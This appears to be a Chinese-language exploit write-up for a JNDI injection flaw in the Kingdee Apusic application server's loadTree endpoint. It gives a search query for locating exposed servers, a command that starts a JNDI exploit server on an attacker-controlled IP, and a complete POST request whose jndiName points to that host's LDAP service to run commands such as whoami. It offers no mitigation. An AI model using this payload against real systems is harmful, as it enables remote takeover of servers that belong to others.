登录 白背景

金蝶 Apusic应用服务器(中间件) loadTree JNDI注入漏洞

一、漏洞简介

金蝶Apusic应用服务器是国内第一个通过J2EE测试认证的应用服务器,全球第四家获得JavaEE 5.0认证授权的产品,完全实现J2EE等企业计算相关的工业规范及标准代码简洁优化,具备了数据持久性、事务完整性、消息传输的可靠性、集群功能的高可用性、以及跨平台的支持等特点。金蝶Apusic应用服务器存在JNDI注入漏洞,攻击者可利用该漏洞获取服务器控制权限。

二、影响版本

  • 金蝶Apusic应用服务器

三、资产测绘

- hunter`app.name="Apusic 金蝶天燕 Server"&&web.title=="Welcome to Apusic Application Server"`
  • 特征

1696168696839-3c2413e8-ebbf-42cd-9972-8a15e6e9b09e.png

四、漏洞复现

  1. 获取dns
id0369.dnslog.cn
  1. JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar上传到vps
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 172.245.154.22 -C "ping id0369.dnslog.cn"

1705247780217-6d9e76d2-acb3-4152-9ce8-e0eba1923307.png

  1. 漏洞利用
POST /appmonitor/protect/jndi/loadTree HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 32
cmd: whoami
Connection: close

jndiName=ldap://172.245.154.22:1389/zdsghu

1705247819851-4b0dfd53-a98b-4999-aebd-53e331ca2e64.png

  1. 获取响应

1705247848436-004aa9e0-8f90-45b9-8921-3c5eab837a1e.png

原文: https://www.yuque.com/xiaokp7/ocvun2/gfw8y01z60s05c84